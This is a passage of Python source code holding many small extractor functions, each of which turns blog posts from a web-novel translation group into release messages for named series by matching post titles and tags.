		return buildReleaseMessage(item, '[Second Saga]', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'Inma no Hado chapter'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Inma no Hado', vol, chp, frag=frag, postfix=postfix)
	if 'Tensei Shoujo no Rirekisho'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Tensei Shoujo no Rirekisho', vol, chp, frag=frag, postfix=postfix)
	if 'TWVUE' in item['tags']:
		return buildReleaseMessage(item, 'Tales of the Wickedly Vicious Underground Empire', vol, chp, frag=frag, postfix=postfix)
	if 'Parallel World Mafia' in item['tags']:
		return buildReleaseMessage(item, 'In A Parallel World With Random Skills, I Reluctantly Become A Mafia Boss?', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'PRC' in item['tags']:
		return buildReleaseMessage(item, 'Parameter Remote Control', vol, chp, frag=frag, postfix=postfix)
	if 'TOWN' in item['tags']:
		return buildReleaseMessage(item, 'The Ability to make town!? ~Let’s make a Japanese Town in Different world~', vol, chp, frag=frag, postfix=postfix)
	if 'Ex-hero' in item['tags']:
		return buildReleaseMessage(item, 'Ex-Hero Candidate’s, who turned out to be a cheat from lv2, laid-back life in Another World', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractRuzeTranslations(item):
	'''
	# Ruze Translations
	Handles 'Guang Zhi Zi' only. Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower():
		return False
	if not (chp or vol):
		return False
	if 'Guang Zhi Zi' in title:
		return buildReleaseMessage(item, 'Guang Zhi Zi', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTsuigeki(item):
	'''
	# Tsuigeki Translations
	Handles 'Seiju no Kuni no Kinju Tsukai' only.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	if 'Seiju no Kuni no Kinju Tsukai' in item['tags']:
		return buildReleaseMessage(item, 'Seiju no Kuni no Kinju Tsukai', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractUnchainedTranslation(item):
	'''
	# Unchained Translation
	Handles 'Ascension of the Alchemist God' (tagged 'The Alchemist God').
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	if 'The Alchemist God' in item['tags']:
		return buildReleaseMessage(item, 'Ascension of the Alchemist God', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractShikkakuTranslations(item):
	'''
	# Shikkaku Translations
	Handles 'Kuro no Maou' (by title) and 'Kamigoroshi no Eiyuu to
	Nanatsu no Seiyaku' (tagged 'KENS').
	Returns a release message or False.
	'''
	title_lower = item['title'].lower()
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in title_lower:
		return False
	if "kuro no maou" in title_lower:
		return buildReleaseMessage(item, 'Kuro no Maou', vol, chp, frag=frag, postfix=postfix)
	if 'KENS' in item['tags']:
		return buildReleaseMessage(item, 'Kamigoroshi no Eiyuu to Nanatsu no Seiyaku', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractRhinabolla(item):
	'''
	# Rhinabolla
	Handles 'Hachinan tte, Sore wa nai Deshou!'; draft posts are skipped.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol) or "preview" in title.lower():
		return False
	if 'Hachi-nan Chapter' in title and 'draft' not in title.lower():
		return buildReleaseMessage(item, 'Hachinan tte, Sore wa nai Deshou!', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractSotranslations(item):
	'''
	# Supreme Origin Translations
	Handles 'Hachinan tte, Sore wa nai Deshou!' and 'The Devil of an
	Angel Chapter'; draft posts are skipped for both.
	Returns a release message or False.
	'''
	title_l = item['title'].lower()
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in title_l:
		return False
	if 'draft' not in title_l:
		if 'hachi-nan chapter' in title_l:
			return buildReleaseMessage(item, 'Hachinan tte, Sore wa nai Deshou!', vol, chp, frag=frag, postfix=postfix)
		if 'the devil of an angel chapter' in title_l:
			return buildReleaseMessage(item, 'The Devil of an Angel Chapter', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTurb0(item):
	'''
	# Turb0 Translation
	Handles 'Kumo Desu ga, Nani ka?' releases, including the lettered
	side-chapter naming schemes ("S15", "J3", "K2", "B1", "blood 12", ...)
	which encode which character's chapter it is.
	Returns a release message or False.
	'''
	# BUG FIX: extractVolChapterFragmentPostfix was called twice on
	# consecutive lines; the second call was a pure no-op and was removed.
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	# Letter-prefixed numbers (" S15", " J3", ...) mark side chapters.
	extr = re.search(r' ([A-Z])\d+', item['title'], flags=re.IGNORECASE)
	if extr:
		# These are numbered, not volumed; if the generic parser put the
		# number into vol, move it to chp.
		if vol and not chp:
			chp, vol = vol, chp
		ep_key = extr.group(1)
		if ep_key == "S":
			postfix = "Shun chapter"
		elif ep_key == "J" or ep_key == "Y":
			postfix = "Julius chapter"
		elif ep_key == "K":
			postfix = "Katia chapter"
		elif ep_key == "B":
			postfix = "Balto chapter"
	if re.search(r'blood \d+', item['title'], flags=re.IGNORECASE):
		postfix = "Blood Chapter"
	# The title itself is frequently typo'd by the site, hence the variants.
	if 'kumo desu ga, nani ka?' in item['title'].lower() \
		or 'kumo desu ka, nani ga?' in item['title'].lower() \
		or 'kumo desu ga, nani ga?' in item['title'].lower():
		return buildReleaseMessage(item, 'Kumo Desu ga, Nani ka?', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractShiroyukineko(item):
	'''
	# 'Shiroyukineko Translations'
	Resolve Shiroyukineko items by tag (several series also accept an
	abbreviation tag or a title prefix).
	Returns a release message or False.
	'''
	title = item['title']
	tags = item['tags']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	if 'DOP' in tags or 'Descent of the Phoenix: 13 Year Old Princess Consort' in tags or title.startswith('DOP Chapter'):
		return buildReleaseMessage(item, 'Descent of the Phoenix: 13 Year Old Princess Consort', vol, chp, frag=frag, postfix=postfix)
	if 'LLS' in tags or 'Long Live Summons!' in tags:
		return buildReleaseMessage(item, 'Long Live Summons!', vol, chp, frag=frag, postfix=postfix)
	if 'VW:UUTS' in tags or 'Virtual World: Unparalled Under The Sky' in tags:
		return buildReleaseMessage(item, 'Virtual World: Unparalleled under the Sky', vol, chp, frag=frag, postfix=postfix)
	if 'Ze Tian Ji' in tags or 'ZTJ Chapter' in title:
		return buildReleaseMessage(item, 'Ze Tian Ji', vol, chp, frag=frag, postfix=postfix)
	if 'The Strongest Dan God' in tags:
		return buildReleaseMessage(item, 'The Strongest Dan God', vol, chp, frag=frag, postfix=postfix)
	if 'Scriptures of the Great Emperor' in tags:
		return buildReleaseMessage(item, 'Scriptures of the Great Emperor', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
# '桜翻訳! | Light novel translations'
####################################################################################################################################################
def extractSakurahonyaku(item):
	'''
	Handles 'Hyouketsu Kyoukai no Eden'.
	NOTE(review): unlike sibling extractors there is no chapter/volume or
	"preview" guard here — preserved as-is; confirm whether that is
	intentional.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if 'hyouketsu kyoukai no eden' not in item['tags']:
		return False
	return buildReleaseMessage(item, 'Hyouketsu Kyoukai no Eden', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractRancer(item):
	'''
	Rancer extractor. Two series additionally require the
	'Chapter Release' tag; the others match on their series tag alone.
	Returns a release message or False.
	'''
	tags = item['tags']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	chapter_release = 'Chapter Release' in tags
	if chapter_release and 'The Strongest Magical Beast' in tags:
		return buildReleaseMessage(item, 'The Strongest Magical Beast', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if chapter_release and 'Apocalypse ЯR' in tags:
		return buildReleaseMessage(item, 'Apocalypse ЯR', vol, chp, frag=frag, postfix=postfix)
	if 'Legend of Xing Feng' in tags:
		return buildReleaseMessage(item, 'Legend of Xingfeng', vol, chp, frag=frag, postfix=postfix)
	if 'The Exceptional Godly Thief-The Good for Nothing Seventh Young Lady' in tags:
		return buildReleaseMessage(item, 'The Good for Nothing Seventh Young Lady', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRadiantTranslations(item):
	'''
	Radiant Translations.
	Items are matched by tag, with a secondary tag group gated behind
	'Chapter Release' and two title-based fallbacks at the end. Checks
	are order-dependent; first match wins. Returns a release message or
	False.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if 'Heavenly Calamity' in item['tags']:
		return buildReleaseMessage(item, 'Heavenly Calamity', vol, chp, frag=frag, postfix=postfix)
	if 'Magic Chef of Ice and Fire' in item['tags']:
		return buildReleaseMessage(item, 'Magic Chef of Ice and Fire', vol, chp, frag=frag, postfix=postfix)
	if 'The Legend of the Dragon King' in item['tags']:
		return buildReleaseMessage(item, 'The Legend of the Dragon King', vol, chp, frag=frag, postfix=postfix)
	if 'Zither Emperor' in item['tags']:
		return buildReleaseMessage(item, 'Zither Emperor', vol, chp, frag=frag, postfix=postfix)
	if 'Radiant Era' in item['tags']:
		return buildReleaseMessage(item, 'Radiant Era', vol, chp, frag=frag, postfix=postfix)
	if 'Lord Xue Ying' in item['tags']:
		return buildReleaseMessage(item, 'Xue Ying Ling Zhu', vol, chp, frag=frag, postfix=postfix)
	if 'Chapter Release' in item['tags']:
		if 'Child of Light' in item['tags'] or 'Guang Zhi Zi' in item['tags']:
			return buildReleaseMessage(item, 'Guang Zhi Zi', vol, chp, frag=frag, postfix=postfix)
		if 'Bing Huo Mo Chu' in item['tags'] or 'Magic Chef of Ice and Fire' in item['tags']:
			return buildReleaseMessage(item, 'Bing Huo Mo Chu', vol, chp, frag=frag, postfix=postfix)
		# NOTE(review): this branch is unreachable — the same tag is already
		# handled (and returns) near the top of the function — and it maps
		# the tag to a *different* series ('Xue Ying Ling Zhu'), which looks
		# like a copy-paste slip. Confirm the intended tag before changing.
		if 'The Legend of the Dragon King' in item['tags']:
			return buildReleaseMessage(item, 'Xue Ying Ling Zhu', vol, chp, frag=frag, postfix=postfix)
		if 'Tempest of the Stellar War' in item['tags']:
			return buildReleaseMessage(item, 'Tempest of the Stellar War', vol, chp, frag=frag, postfix=postfix)
	# Title-based fallbacks; hyphens are normalized to spaces for DMWG.
	if ('dragon marked war god' in item['title'].lower().replace("-", " ") or
		'dmwg' in item['title'].lower() or
		'Dragon Marked War God' in item['tags']):
		return buildReleaseMessage(item, 'Dragon-Marked War God', vol, chp, frag=frag, postfix=postfix)
	if 'beseech the devil' in item['title'].lower():
		return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTalesOfMU(item):
	'''
	Parse releases of the OEL web-serial "Tales of MU".

	A post counts as a release when any of its tags mentions "volume"
	and the title parser found a chapter or volume number.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	has_volume_tag = any('volume' in tag.lower() for tag in item['tags'])
	if has_volume_tag and (chp or vol):
		return buildReleaseMessage(item, 'Tales of MU', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPeasKingdom(item):
	'''
	Parse releases from Pea's Kingdom (OEL original).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Tags are compared case-insensitively on this site.
	lowered_tags = {tag.lower() for tag in item['tags']}
	if 'second chance' in lowered_tags:
		return buildReleaseMessage(item, 'Second Chance: a Wonderful New Life', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSolitaryTranslation(item):
	'''
	Parse releases from Solitary Translation (single series).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'The Great Ruler' not in item['tags']:
		return False
	return buildReleaseMessage(item, 'The Great Ruler', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractThyaeria(item):
	'''
	Parse releases from Thyaeria's translations.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Tag -> series name. Dicts keep insertion order, so the first
	# matching tag wins, exactly like the original if-chain.
	series_for_tag = {
		'Tales of Demons and Gods'  : 'Tales of Demons and Gods',
		'Warlock of the Magus World': 'Warlock of the Magus World',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPlaceOfLegends(item):
	'''
	Parse releases from Place of Legends (all OEL originals).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Every series on this site uses its tag verbatim as the series name.
	known_series = (
		'The Fragile Monster Lord',
		'The New Start',
		'The Rude Time Stopper',
	)
	for series in known_series:
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractShinsori(item):
	'''
	Parse releases from Shinsori Translations.

	Series are identified by substrings of the post title (one entry also
	checks a tag). Entries are evaluated in order; the first hit wins.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	title = item['title']
	# (match predicate, series name, tl_type or None for the default)
	checks = [
		(lambda: 'Doll Dungeon' in title, 'Doll Dungeon', None),
		(lambda: 'Levelmaker –' in title, 'Levelmaker -Raising Levels While Living in Another World-', None),
		(lambda: 'Isekai Tensei Harem' in title, 'Isekai Tensei Harem', None),
		(lambda: 'Undead Seeks Warmth' in title, 'Undead Seeks Warmth', None),
		(lambda: 'Raising Slaves in Another World While on a Journey' in title, 'Raising Slaves in Another World While on a Journey', None),
		(lambda: 'Occupation: Adventurer ; Race: Various' in title or 'Race: Various' in item['tags'], 'Occupation: Adventurer ; Race: Various', None),
		(lambda: 'Yuusha ga onna da to dame desu ka?' in title, 'Yuusha ga onna da to dame desu ka?', None),
		(lambda: 'The Bears Bear a Bare Kuma' in title or 'Kuma Kuma Kuma Bear' in title, 'Kuma Kuma Kuma Bear', None),
		(lambda: 'Charmed?' in title, 'Charmed?', 'oel'),
		(lambda: 'Silver Death' in title, 'Silver Death', 'oel'),
	]
	for matches, series, tl_type in checks:
		if matches():
			if tl_type:
				return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoaring(item):
	'''
	Parse releases from Soaring Translations.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	lowered = item['title'].lower()
	if not (chp or vol) or "preview" in lowered:
		return False
	# If you release "teaser" chapters, you're a douche
	if "teaser" in lowered:
		return False
	is_lsg = ('Limitless Sword God Chapter' in item['title']
	          or 'Limitless Sword God' in item['tags']
	          or 'LSG' in item['tags'])
	if is_lsg:
		return buildReleaseMessage(item, 'Limitless Sword God', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoraTranslations(item):
	'''
	Parse releases from Sora Translations.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	lowered = item['title'].lower()
	# Reject posts without chapter info, previews, and teasers alike.
	if not (chp or vol) or "preview" in lowered or "teaser" in lowered:
		return False
	if 'Isekai Mahou....' in item['tags']:
		return buildReleaseMessage(item, 'Isekai Mahou wa Okureteru!', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTotallyInsaneTranslation(item):
	'''
	Parse releases from Totally Insane Translation.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Abbreviated tag -> full series name; first match wins.
	series_for_tag = {
		'PMG': 'Peerless Martial God',
		'DtH': 'Devouring The Heavens',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTrungtNguyen(item):
	'''
	Parse releases from trungtnguyen's blog.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# These series use their tag verbatim as the series name.
	simple_series = (
		'Underdog Versus Boss',
		'Xiao Qi Wait',
		'Beloved Little Treasure',
		'Real Fake Fiance',
		'Demoness Go See The Emperor',
	)
	for series in simple_series:
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	if 'The Reluctant Bride Book I' in item['tags']:
		# Releases for this book rarely carry a volume marker; default to 1.
		return buildReleaseMessage(item, 'The Reluctant Bride Book I', vol or 1, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTaffyTranslations(item):
	'''
	Parse releases from Taffy Translations.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Tag membership is an exact list match, so 'CCM' never collides with 'CC'.
	series_for_tag = {
		'CCM': 'Close Combat Mage',
		'CC' : 'Cheating Craft',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOneManArmy(item):
	'''
	Parse releases from One Man Army translations.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# DBWG posts are identified either by the title abbreviation or the tag.
	is_dbwg = "DBWG – Chapter" in item['title'] or 'Dragon-Blooded War God' in item['tags']
	if is_dbwg:
		return buildReleaseMessage(item, 'Dragon-Blooded War God', vol, chp, frag=frag, postfix=postfix)
	if 'Warlock of the Magus World' in item['tags']:
		return buildReleaseMessage(item, 'Warlock of the Magus World', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOKTranslation(item):
	'''
	Parse releases from OK Translation (single series).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'Oyaji Kanojo' not in item['tags']:
		return False
	return buildReleaseMessage(item, 'Oyaji Kanojo', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractUltimateArcane(item):
	'''
	Parse releases from Ultimate Arcane.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Tag -> canonical series name (the second tag is shouty-cased on site).
	series_for_tag = {
		'Isekai ni kanaderu densetsu ~toki wo tomeru mono~': 'Isekai ni kanaderu densetsu ~toki wo tomeru mono~',
		'JIKUU MAHOU DE ISEKAI TO CHIKYUU WO ITTARIKITARI' : 'Jikuu Mahou de Isekai to Chikyuu wo ittarikitari',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRainbowTranslations(item):
	'''
	Parse releases from Rainbow Translations (single OEL series).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'Myriad of Shades' not in item['tags']:
		return False
	return buildReleaseMessage(item, 'Myriad of Shades', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractOmgitsaray(item):
	'''
	Parse releases from omgitsaray; every "chapter" post belongs to the
	site's single series.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	lowered = item['title'].lower()
	if "preview" in lowered or not (chp or vol):
		return False
	if "chapter" not in lowered:
		return False
	return buildReleaseMessage(item, '9 Heavenly Thunder Manual', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractReddyCreations(item):
	'''
	Parse releases from Reddy Creations (OEL originals).

	Posts whose title mentions "rigel" belong to 'Rigel'; every other post
	with chapter/volume info is attributed to 'Riddick/ Against the Heavens'.

	Fix: the original ended with a `return False` that was unreachable
	because both branches of the preceding if/else returned; the dead
	statement and the redundant `else` are removed.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if "rigel" in item['title'].lower():
		return buildReleaseMessage(item, 'Rigel', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	# Anything else with chapter info on this site is a Riddick release.
	return buildReleaseMessage(item, 'Riddick/ Against the Heavens', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractShinSekaiYori(item):
	'''
	Parse releases of "Shin Sekai yori".

	Chapter numbering can live in the tags rather than the title, so every
	tag containing "chapter" is folded into the string handed to the
	numbering parser along with the title.
	'''
	# The leading "" keeps the joined string identical to the original
	# concatenation (which always started with a space).
	parts = [""]
	parts.extend(tag for tag in item['tags'] if "chapter" in tag.lower())
	parts.append(item['title'])
	searchable = " ".join(parts)
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(searchable)
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if frag:
		# Fragments on this site are expressed in tenths.
		frag = frag / 10
	return buildReleaseMessage(item, 'Shin Sekai yori', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractPrinceRevolution(item):
	'''
	Parse releases from Prince Revolution!.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Tag -> series name; dicts preserve insertion order, so precedence
	# matches the original if-chain.
	series_for_tag = {
		'Romance RPG'             : 'Romance RPG',
		'The Legend of Sun Knight': 'The Legend of Sun Knight',
		'Dominions End'           : 'Dominions End',
		'½ Prince'                : '½ Prince',
		'killvsprince'            : 'Kill No More VS 1/2 Prince',
		'Illusions-Lies-Truth'    : 'Illusions, Lies, Truth',
		'No Hero'                 : 'No Hero',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractUntunedTranslation(item):
	'''
	Parse releases from Untuned Translation.

	Titles use roman-numeral volumes, which the numbering parser does not
	understand, so they are rewritten to "vol N" before parsing. Longer
	numerals are substituted first so "III" is never eaten by "II"/"I".
	'''
	roman_volume_fixes = (
		(" III(", " vol 3 ("),
		(" III:", " vol 3:"),
		(" II:",  " vol 2:"),
		(" I:",   " vol 1:"),
		(" IV:",  " vol 4:"),
		(" V:",   " vol 5:"),
	)
	title = item['title']
	for roman, arabic in roman_volume_fixes:
		title = title.replace(roman, arabic)
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if chp and vol:
		if 'meg and seron' in item['tags']:
			return buildReleaseMessage(item, 'Meg and Seron', vol, chp, frag=frag, postfix=postfix)
		if 'lillia and treize' in item['tags']:
			return buildReleaseMessage(item, 'Lillia to Treize', vol, chp, frag=frag, postfix=postfix)
	# TODO: Needs the facility to parse roman numerals!
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRumorsBlock(item):
	'''
	Parse releases of the OEL serial "Rumor's Block".
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	tagged = "Rumor's Block" in item['tags']
	titled = "chapter" in item['title'].lower()
	if tagged and titled:
		return buildReleaseMessage(item, "Rumor's Block", vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTwistedCogs(item):
	'''
	Parse releases of the OEL serials "Twisted Cogs" and "Twisted Smut".
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Text after the first en-dash in the title is the chapter name.
	dash_parts = item['title'].split('–', 1)
	if len(dash_parts) == 2:
		postfix = dash_parts[1].strip()
	series = 'Twisted Smut' if "smut" in item['title'].lower() else 'Twisted Cogs'
	return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractReantoAnna(item):
	'''
	Parse releases from Reanto & Anna (single series).

	Posts are matched either by the (misspelled) site tag, or by being an
	untagged "Chapter" post with only the default 'Uncategorized' tag.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	tagged = 'Only I am not attacked in a world over runned by zombies' in item['tags']
	untagged_chapter = ("Chapter" in item['title']
	                    and len(item['tags']) == 1
	                    and 'Uncategorized' in item['tags'])
	if tagged or untagged_chapter:
		return buildReleaseMessage(item, 'Only I am not attacked in a world overflowing with zombies', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSubudai11(item):
	'''
	Parse releases from subudai11; series are identified by title substrings.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Title substring -> series name; first match wins.
	series_for_needle = {
		'Mai Kitsune Waifu Chapter'   : 'My Fox Immortal Wife',
		'My Beautiful Teacher Chapter': 'My Beautiful Teacher',
		'Awakening – 仿如昨日'         : 'Awakening – 仿如昨日',
	}
	for needle, series in series_for_needle.items():
		if needle in item['title']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOneSecondSpring(item):
	'''
	Parse releases from One Second Spring.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Each series uses its tag verbatim as the series name.
	known_series = (
		'The Princess Who Cannot Marry',
		'Heavy Sweetness Ash-like Frost',
		'Our Second Master',
	)
	for series in known_series:
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslationRaven(item):
	'''
	Parse releases from Translation Raven (single series).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'Godly Hunter' not in item['tags']:
		return False
	return buildReleaseMessage(item, 'Godly Hunter', vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractRoxism(item):
	'''
	Parse releases from Roxism.

	Every series here additionally requires "chapter" in the title, so that
	shared condition is hoisted out of the per-series checks.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	lowered = item['title'].lower()
	if "preview" in lowered or not (chp or vol):
		return False
	if "chapter" not in lowered:
		return False
	series_for_tag = {
		'Bocchi Tenseiki': 'Bocchi Tenseiki',
		'Seirei Gensouki ~Konna Sekai de Deaeta Kimi ni~': 'Seirei Gensouki ~Konna Sekai de Deaeta Kimi ni~',
		'DHM': 'Dungeon+Harem+Master',
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSilvasLibrary(item):
	'''
	Parse releases from Silva's Library.

	The site hosts both OEL originals and translations; each entry records
	the tag(s) that identify it, the canonical series name, and the
	tl_type to emit (None means use buildReleaseMessage's default).
	Entries are checked in order and the first matching tag wins.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	series_table = [
		(("Silva's Diary - Zero no Tsukaima",),     "Silva's Diary - Zero no Tsukaima",       'oel'),
		(('God of Destruction',),                   'God of Destruction',                     'oel'),
		(('God of Chaos',),                         'God of Chaos',                           'oel'),
		(('My Path of Justice', 'MPJ1'),            'My Path of Justice',                     'oel'),
		(('Truth and Myths',),                      'Truth and Myths',                        'oel'),
		(('Soft Spoken Brutality',),                'Soft Spoken Brutality',                  'oel'),
